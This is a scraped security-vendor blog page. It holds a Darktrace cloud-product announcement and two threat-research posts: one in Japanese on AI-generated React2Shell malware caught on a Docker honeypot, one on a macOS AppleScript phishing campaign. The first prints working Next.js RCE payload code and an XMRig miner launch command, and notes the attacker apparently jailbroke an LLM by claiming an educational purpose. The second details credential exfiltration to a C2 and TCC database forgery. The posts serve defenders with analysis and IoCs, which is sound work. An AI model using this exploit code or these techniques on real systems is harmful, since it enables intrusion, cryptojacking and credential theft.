ブログ
/
Cloud
/
October 3, 2024

Introducing Real-Time Multi-Cloud Detection & Response Powered by AI

This blog announces the general availability of Microsoft Azure support for Darktrace / CLOUD, enabling real-time cloud detection and response across dynamic multi-cloud environments. Read more to discover how Darktrace is pioneering AI-led real-time cloud detection and response.
Written by
Adam Stevens
Senior Director of Product, Cloud | Darktrace
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Adam Stevens
Senior Director of Product, Cloud | Darktrace
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
03
Oct 2024

We are delighted to announce the general availability of Microsoft Azure support for Darktrace / CLOUD, enabling real-time cloud detection and response across dynamic multi-cloud environments. Built on Self-Learning AI, Darktrace / CLOUD leverages Microsoft’s new virtual network flow logs (VNet flow) to offer an agentless-first approach that dramatically simplifies detection and response within Azure, unifying cloud-native security with Darktrace’s innovative ActiveAI Security Platform.

As organizations increasingly adopt multi-cloud architectures, the need for advanced, real-time threat detection and response is critical to keep pace with evolving cloud threats. Security teams face significant challenges, including increased complexity, limited visibility, and siloed tools. The dynamic nature of multi-cloud environments introduces ever-changing blind spots, while traditional security tools struggle to provide real-time insights, often offering static snapshots of risk. Additionally, cloud security teams frequently operate in isolation from SOC teams, leading to fragmented visibility and delayed responses. This lack of coordination, especially in hybrid environments, hinders effective threat detection and response. Compounding these challenges, current security solutions are split between agent-based and agentless approaches, with agentless solutions often lacking real-time awareness and agent-based options adding complexity and scalability concerns. Darktrace / CLOUD helps to solve these challenges with real-time detection and response designed specifically for dynamic cloud environments like Azure and AWS.

Pioneering AI-led real-time cloud detection & response

Darktrace has been at the forefront of real-time detection and response for over a decade, continually pushing the boundaries of AI-driven cybersecurity. Our Self-Learning AI uniquely positions Darktrace with the ability to automatically understand and instantly adapt to changing cloud environments. This is critical in today’s landscape, where cloud infrastructures are highly dynamic and ever-changing.  

Built on years of market-leading network visibility, Darktrace / CLOUD understands ‘normal’ for your unique business across clouds and networks to instantly reveal known, unknown, and novel cloud threats with confidence. Darktrace Self-Learning AI continuously monitors activity across cloud assets, containers, and users, and correlates it with detailed identity and network context to rapidly detect malicious activity. Platform-native identity and network monitoring capabilities allow Darktrace / CLOUD to deeply understand normal patterns of life for every user and device, enabling instant, precise and proportionate response to abnormal behavior - without business disruption.

Leveraging platform-native Autonomous Response, AI-driven behavioral containment neutralizes malicious activity with surgical accuracy while preventing disruption to cloud infrastructure or services. As malicious behavior escalates, Darktrace correlates thousands of data points to identify and instantly respond to unusual activity by blocking specific connections and enforcing normal behavior.

Figure 1: AI-driven behavioral containment neutralizes malicious activity with surgical accuracy while preventing disruption to cloud infrastructure or services.

Unparalleled agentless visibility into Azure

As a long-term trusted partner of Microsoft, Darktrace leverages Azure VNet flow logs to provide agentless, high-fidelity visibility into cloud environments, ensuring comprehensive monitoring without disrupting workflows. By integrating seamlessly with Azure, Darktrace / CLOUD continues to push the envelope of innovation in cloud security. Our Self-learning AI not only improves the detection of traditional and novel threats, but also enhances real-time response capabilities and demonstrates our commitment to delivering cutting-edge, AI-powered multi-cloud security solutions.

  • Integration with Microsoft Virtual network flow logs for enhanced visibility
    Darktrace / CLOUD integrates seamlessly with Azure to provide agentless, high-fidelity visibility into cloud environments. VNet flow logs capture critical network traffic data, allowing Darktrace to monitor Azure workloads in real time without disrupting existing workflows. This integration significantly reduces deployment time by 95%1 and cloud security operational costs by up to 80%2 compared to traditional agent-based solutions. Organizations benefit from enhanced visibility across dynamic cloud infrastructures, scaling security measures effortlessly while minimizing blind spots, particularly in ephemeral resources or serverless functions.
  • High-fidelity agentless deployment
    Agentless deployment allows security teams to monitor and secure cloud environments without installing software agents on individual workloads. By using cloud-native APIs like AWS VPC flow logs or Azure VNet flow logs, security teams can quickly deploy and scale security measures across dynamic, multi-cloud environments without the complexity and performance overhead of agents. This approach delivers real-time insights, improving incident detection and response while reducing disruptions. For organizations, agentless visibility simplifies cloud security management, lowers operational costs, and minimizes blind spots, especially in ephemeral resources or serverless functions.
  • Real-time visibility into cloud assets and architectures
    With real-time Cloud Asset Enumeration and Dynamic Architecture Modeling, Darktrace / CLOUD generates up-to-date architecture diagrams, giving SecOps and DevOps teams a unified view of cloud infrastructures. This shared context enhances collaboration and accelerates threat detection and response, especially in complex environments like Kubernetes. Additionally, Cyber AI Analyst automates the investigation process, correlating data across networks, identities, and cloud assets to save security teams valuable time, ensuring continuous protection and efficient cloud migrations.
Figure 2: Real-time visibility into Azure assets and architectures built from network, configuration and identity and access roles.

Unified multi-cloud security at scale

As organizations increasingly adopt multi-cloud strategies, the complexity of managing security across different cloud providers introduces gaps in visibility. Darktrace / CLOUD simplifies this by offering agentless, real-time monitoring across multi-cloud environments. Building on our innovative approach to securing AWS environments, our customers can now take full advantage of robust real-time detection and response capabilities for Azure. Darktrace is one of the first vendors to leverage Microsoft’s virtual network flow logs to provide agentless deployment in Azure, enabling unparalleled visibility without the need for installing agents. In addition, Darktrace / CLOUD offers automated Cloud Security Posture Management (CSPM) that continuously assesses cloud configurations against industry standards.  Security teams can identify and prioritize misconfigurations, vulnerabilities, and policy violations in real-time. These capabilities give security teams a complete, live understanding of their cloud environments and help them focus their limited time and resources where they are needed most.

This approach offers seamless integration into existing workflows, reducing configuration efforts and enabling fast, flexible deployment across cloud environments. By extending its capabilities across multiple clouds, Darktrace / CLOUD ensures that no blind spots are left uncovered, providing holistic, multi-cloud security that scales effortlessly with your cloud infrastructure. diagrams, visualizes cloud assets, and prioritizes risks across cloud environments.

Figure 3: Unified view of AWS and Azure cloud posture and compliance over time.

The future of cloud security: Real-time defense in an unpredictable world

Darktrace / CLOUD’s support for Microsoft Azure, powered by Self-Learning AI and agentless deployment, sets a new standard in multi-cloud security. With real-time detection and autonomous response, organizations can confidently secure their Azure environments, leveraging innovation to stay ahead of the constantly evolving threat landscape. By combining Azure VNet flow logs with Darktrace’s AI-driven platform, we can provide customers with a unified, intelligent solution that transforms how security is managed across the cloud.

Unlock advanced cloud protection

Darktrace / CLOUD solution brief screenshot

Download the Darktrace / CLOUD solution brief to discover how autonomous, AI-driven defense can secure your environment in real-time.

  • Achieve 60% more accurate detection of unknown and novel cloud threats.
  • Respond instantly with autonomous threat response, cutting response time by 90%.
  • Streamline investigations with automated analysis, improving ROI by 85%.
  • Gain a 30% boost in cloud asset visibility with real-time architecture modeling.

    • Learn More:

    References

    1. Based on internal research and customer data

    2. Based on internal research

    執筆者
    Adam Stevens
    Senior Director of Product, Cloud | Darktrace
    Inside the SOC
    Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
    Written by
    Adam Stevens
    Senior Director of Product, Cloud | Darktrace

    AI/LLMで生成されたマルウェアを使ったReact2Shellエクスプロイト

    Network
    February 10, 2026
    Nathaniel Bill
    Malware Research Engineer
    Watch the NIS2 Webinar
    よく読まれているブログ
    1
    Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
    Nov 19, 2025
    2
    How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
    May 8, 2024
    3
    Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
    Jun 21, 2024
    4
    The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
    Apr 9, 2024
    5
    The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
    May 13, 2024

    More in this series

    No items found.
    さらに読む
    Cloud
    January 14, 2026

    React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

    This blog breaks down how attackers rapidly weaponized the React2Shell vulnerability, with a particular focus on cloud‑native financial environments. Drawing on Darktrace’s honeypot research, it explores emerging threat actor tooling, exploitation timelines, and why behavioral‑anomaly‑led security is critical in today’s cloud landscape.
    Nathaniel Jones
    VP, Security & AI Strategy, Field CISO
    Read more
    Cloud
    January 13, 2026

    クラウドセキュリティが本当に重要な場所はランタイム:検知、フォレンジック、リアルタイムアーキテクチャ認識の重要性

    クラウドセキュリティはこれまで予防、ポスチャ管理、設定にかなりの重点が置かれてきました。しかし実際の攻撃はそこでは発生しません。 攻撃はランタイムにおいて、稼働中のワークロードやアイデンティティにわたって進行していきますが、そこでは可視性が限られており証拠が短時間で消滅します。 このブログではランタイムが保護すべき最もクリティカルなレイヤーである理由、動的なクラウドの挙動を攻撃者がどのように悪用しているか、なぜポスチャベースだけでは不十分かを紹介します。
    Adam Stevens
    Senior Director of Product, Cloud | Darktrace
    Read more
    Cloud
    November 19, 2025

    Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD

    Generative AI services like Amazon Bedrock are introducing new risks around access, visibility, and data exposure. This blog explores how Darktrace / CLOUD helps prevent these incidents through deep configuration visibility, privilege analysis, misconfiguration detection, and behavioral anomaly monitoring across Bedrock and SageMaker environments.
    Adam Stevens
    Senior Director of Product, Cloud | Darktrace
    Read more

    Blog

    /

    Network

    /

    February 12, 2026

    AI/LLMで生成されたマルウェアを使ったReact2Shellエクスプロイト

    Default blog imageDefault blog image

    はじめに

    敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots” と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

    最近観測されたダークトレースのCloudypots環境に対する侵入インシデントは、React2Shell 脆弱性をエクスプロイトする完全にAI生成のマルウェアを明らかにしました、AI 支援ソフトウェア開発(“vibecoding”とも呼ばれます)が広く普及するにつれ、攻撃者はますます大規模言語モデルを使って迅速にツールを開発するようになっています。このインシデントは状況の大きな変化を表しています。AIによって、今では低スキルのオペレーターであっても効果的なエクスプロイトのフレームワークを短期間に作りだすことが可能となっているのです。このブログでは、攻撃チェーンを精査し、AI生成ペイロードを分析し、この変化が防御者にとって何を意味するかを解説します。

    初期アクセス

    ダークトレースのdockerハニーポットに対して侵入が観測されました。これは意図的にDockerデーモンを認証なしでインターネットに露出させています。この設定により任意の攻撃者がデーモンを発見しDocker APIを通じてコンテナを作成することが可能です。 

    攻撃者は“python-metrics-collector”という名前のコンテナを生成しました。これにはcurl、wget、python 3を含む必要ツールを最初にインストールするスタートアップコマンドが設定されていました。

    Container spawned with the name ‘python-metrics-collector’.
    図1:‘python-metrics-collector’ という名前で生成されたコンテナ

    次に、必要な一連のpythonパッケージを次からダウンロードします

    • hxxps://pastebin[.]com/raw/Cce6tjHM,

    最後に次からpythonスクリプトをダウンロードして実行します

    • hxxps://smplu[.]link/dockerzero.

    このリンクは“hackedyoulol”がホストするGitHub Gistにリダイレクトされますが、このアカウントは本ブログ執筆時点でGitHubから利用停止措置を受けています。

    • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

    注目すべき点は、dockerを狙ったマルウェアであるにもかかわらずこのスクリプトにdockerスプレッダーが含まれていなかったことです。これは、感染の拡大が別に中央管理されたスプレッダーサーバーで処理されている可能性が高いことを示しています。

    展開されたコンポーネントと実行チェーン

    ダウンロードされたPythonペイロードは侵入のための中心的な実行コンポーネントでした。マルウェア自体が難読化設計となっており、エクスプロイトスクリプトと拡散メカニズムの間でこの難読化が強化されていました。dockerマルウェアには通常、自身のスプレッダーロジックが含まれているため、これが欠けているということは攻撃者が拡散専用のツールをリモートで管理し、実行していることを示唆しています。

    スクリプトは複数行のコメントで始まっています:
    """
       Network Scanner with Exploitation Framework
       Educational/Research Purpose Only
       Docker-compatible: No external dependencies except requests
    """

    これは非常に多くのことを語っています。当社が分析したサンプルのほとんどではファイル内にこのレベルのコメントは含まれていません。多くの場合それらは分析を阻害するために意図的に理解しにくく設計されています。人間のオペレーターが短時間に記述したスクリプトはたいていの場合わかりやすさよりもスピードと機能を優先しています。一方、LLMはすべてのコードに対して詳しくコメントを記録するよう設計されており、このサンプルにも繰り返しこのパターンが表れています。 さらに、AIはそのセーフガードの一環としてマルウェアの生成を拒否します。

    さらに、“Educational/ResearchPurpose Only(教育/研究目的専用)” というフレーズが含まれていることは、攻撃者が悪意ある要求を教育目的と偽ることによって、AIモデルのジェイルブレイクを行ったことを示唆しています。

    さらにスクリプトの一部をAI 検知ソフトウェアでテストしたところ、その出力結果はコードがおそらくLLMによって生成されているということを示していました。

    GPTZero AI-detection results indicating that the script was likely generated using an AI model.
    図2:GPTZeroによるAI検知の結果は、スクリプトがAIモデルを使って生成された可能性を示しています。

    スクリプトはよくできたReact2Shellエクスプロイトツールキットであり、リモートコード実行を行いXMRig (Monero) 暗号通貨マイニングマルウェアを展開しようとするものです。 IP生成ループを使って標的を見つけだし、以下を含むエクスプロイトリクエストを実行します:

    • 念入りに構成されたNext.jsサーバーコンポーネントペイロード
    • 実行を強制しコマンド出力を明らかにするよう設計されたチャンク
    • 任意のシェルコマンドを実行する子プロセス起動

      def execute_rce_command(base_url, command, timeout=120):  
       """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
       DO NOT MODIFY THIS FUNCTION
       Returns: (success, output)  
       """  
    try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

     crafted_chunk = {
          "then": "$1:__proto__:then",
          "status": "resolved_model",
          "reason": -1,
          "value": '{"then": "$B0"}',
          "_response": {
              "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
              "_formData": {
                  "get": "$1:constructor:constructor",
              },
          },
      }

      files = {
          "0": (None, json.dumps(crafted_chunk)),
          "1": (None, '"$@0"'),
      }

      headers = {"Next-Action": "x"}

      res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

    この関数は最初 ‘whoami’を使って起動され、ホストが脆弱かどうかを判断し、次にwgetを使ってGitHubレポジトリからXMRigをダウンロードし、設定されたマイニングツールとウォレットアドレスを指定してこれを起動します。

    ]\

    WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
    XMRIG_VERSION = "6.21.0"
    POOL_PORT_443 = "pool.supportxmr.com:443"
    ...
    print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
    miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

    success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

    多くの攻撃者が気づいていないことは、Moneroでは不透明なブロックチェーン(トランザクションを追跡できずウォレット残高が閲覧できない)が使われているものの、supportxmr等のマイニングプールは各ウォレットのアドレスに対する統計情報を公開していることです。これによりキャンペーンの成功と攻撃者の利益を追跡することは簡単に行えます。

    The supportxmr mining pool overview for the attackers wallet address
    図3:supportxmrマイニングツールに表示される攻撃者のウォレットアドレス概要

    この情報に基づき、この攻撃者はキャンペーン開始以来0.015 XMRを得ましたがこれは本ブログ執筆時点で5ポンド程度です。1日あたり、攻撃者は0.004 XMRを生成しており、これは1.33ポンドの価値です。ワーカー数は91であり、91のホストがこのサンプルに感染していることを意味しています。

    まとめ

    攻撃者が生成した金額はこのケースでは比較的少額であり、暗号通貨マイニングは新しいテクニックとは言えませんが、このキャンペーンはAIベースのLLMがサイバー犯罪を容易にした実例です。モデルとの1度のプロンプトセッションで、この攻撃者は機能するエクスプロイトフレームワークを生成し、90以上のホストを侵害することができています。これはAIベースのLLMによってサイバー犯罪がこれまで以上に簡単になったことを実証しており、攻撃者にとってのAIのオペレーション上の価値は過小評価されるべきではないことを示しています。

    CISOおよびSOCのリーダーは、このインシデントを近い将来起こり得ることとして想定すべきです。脅威アクターは、今やオンデマンドでカスタムマルウェアを生成し、エクスプロイトを即座に改変し、侵害のすべての段階を自動化することができます。防御者は、迅速なパッチ適用、継続的なアタックサーフェスの監視、およびビヘイビアベースの検知アプローチを優先的に進める必要があります。AI 生成されたマルウェアはもはや理論上のものではなく、実際に運用されており、スケーラブルで、誰でもアクセスできるものなのです。

    アナリストのコメント

    ダウンロードされたスクリプトにDockerスプレッダーが含まれていないように見えることが注目に値します。これはこのマルウェアが感染したホストから他の被害者に複製されないことを意味しています。これはダークトレースの調査チームが分析した他のサンプルと比較して、Dockerマルウェアではあまりないことです。これは拡散のための別のスクリプトがあることを示しており、おそらく攻撃者が中央のスプレッダーサーバーから展開するものと思われます。この推論は接続を開始したIP、49[.]36.33.11が、インドの一般住宅用ISPに登録されていることからも成り立ちます。攻撃者が住宅用プロキシサーバーを使って形跡を隠している可能性もありますが、彼らの自宅のコンピューターから拡散用スクリプトを実行していることも考えられます。しかしこれは確認済みのアトリビューションと理解するべきではありません。

    担当:Nathaniel Bill (Malware Research Engineer)、Nathaniel Jones (Nathaniel Jones, VP Threat Research | Field CISO AISecurity)

    侵害インジケータ(IoC)

    Spreader IP - 49[.]36.33.11
    Malware host domain - smplu[.]link
    Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
    Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

    Continue reading
    About the author
    Nathaniel Bill
    Malware Research Engineer

    Blog

    /

    Network

    /

    February 9, 2026

    AppleScript Abuse: Unpacking a macOS Phishing Campaign

    Default blog imageDefault blog image

    Introduction

    Darktrace security researchers have identified a campaign targeting macOS users through a multistage malware campaign that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.

    The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.

    Due to increased built-in security mechanisms in macOS such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats r[NJ1] ely more heavily on social engineering instead of vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].

    Technical analysis

    The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attemps to masquerade as a legitimate Microsoft document.

    The AppleScript header prompting execution of the script.
    Figure 1: The AppleScript header prompting execution of the script.

    Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary as AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, assuming a user likely will not to the end of the file where the malicious code is placed.

    Curl request to receive the next stage.
    Figure 2: Curl request to receive the next stage.

    This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user’s macOS operating system, CPU type and language. This request retrieves another script, which is saved as a hidden file at in ~/.ex.scpt, executed, and then deleted.

    The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].

    Fake dialog prompt for system password.
    Figure 3: Fake dialog prompt for system password.

    The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.

    Figure 4: Requirements gathered on trusted binary.

    Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, Script Editor, osascript, and bash. Using the codesign command codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is then compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.[NB2]

    To bypass integrity checks, the TCC directory is renamed to com.appled.tcc using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].

    Example of how users interact with TCC.
    Figure 5: TCC directory renamed to com.appled.TCC.
    Figure 6: Example of how users interact with TCC.

    After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistence authorization for:

    • Full disk access
    • Screen recording
    • Accessibility
    • Camera
    • Apple Events 
    • Input monitoring

    The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.

    Although the malware is attempting to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, as tcc.db reloads now have more integrity checks and will fail on Mobile Device Management (MDM) [NB5] systems as their profiles override TCC.

    Snippet of decoded Base64 response.
    Figure 7: Snippet of decoded Base64 response.

    A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:

    /controller.php?req=instd

    /controller.php?req=tell

    /controller.php?req=skip

    These return a node archive, bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identified the system platform, whether macOS, Linux or Windows, and then gathers OS version, CPU details, memory usage, disk layout, network interfaces, and running process. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and will receive a Base64-encoded response.

    LaunchAgent patterns to be replaced with victim information.
    Figure 8: LaunchAgent patterns to be replaced with victim information.

    The Base64-encoded response decodes to an additional Javacript that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware automatically starts. The .plist launches node and default.js on load, and uses output logging to log errors and outputs.

    Default.js is Base64 encoded JavaScript that functions as a command loop, periodically sending logs to the C2, and checking for new payloads to execute. This gives threat actors ongoing and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.

    Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64 and written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met.  However, this mechanism enables the delivery and execution of payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.

    Conclusion

    This campaign shows how a malicious threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.

    Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure the most up to date protections.  These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.

    Credit to Tara Gould (Malware Research Lead)
    Edited by Ryan Traill (Analyst Content Lead)

    Indicators of Compromise (IoCs)

    88.119.171[.]59

    sevrrhst[.]com

    https://sevrrhst[.]com/inc/register.php?req=next

    https://stomcs[.]com/inc/register.php?req=next
    https://techcross-es[.]com

    Confirmation_Token_Vesting.docx.scpt - d3539d71a12fe640f3af8d6fb4c680fd

    EDD_Questionnaire_Individual_Blank_Form.docx.scpt - 94b7392133935d2034b8169b9ce50764

    Investor Profile (Japan-based) - Shiro Arai.pdf.scpt - 319d905b83bf9856b84340493c828a0c

    MITRE ATTACK

    T1566 - Phishing

    T1059.002 - Command and Scripting Interpreter: Applescript

    T1059.004 – Command and Scripting Interpreter: Unix Shell

    T1059.007 – Command and Scripting Interpreter: JavaScript

    T1222.002 – File and Directory Permissions Modification

    T1036.005 – Masquerading: Match Legitimate Name or Location

    T1140 – Deobfuscate/Decode Files or Information

    T1547.001 – Boot or Logon Autostart Execution: Launch Agent

    T1553.006 – Subvert Trust Controls: Code Signing Policy Modification

    T1082 – System Information Discovery

    T1057 – Process Discovery

    T1105 – Ingress Tool Transfer

    References

    [1] https://www.darktrace.com/blog/from-the-depths-analyzing-the-cthulhu-stealer-malware-for-macos

    [2] https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic

    [3] https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam

    [4] https://developer.apple.com/documentation/appkit

    [5] https://www.huntress.com/blog/full-transparency-controlling-apples-tcc

    Continue reading
    About the author
    Tara Gould
    Malware Research Lead
    あなたのデータ × DarktraceのAI
    唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ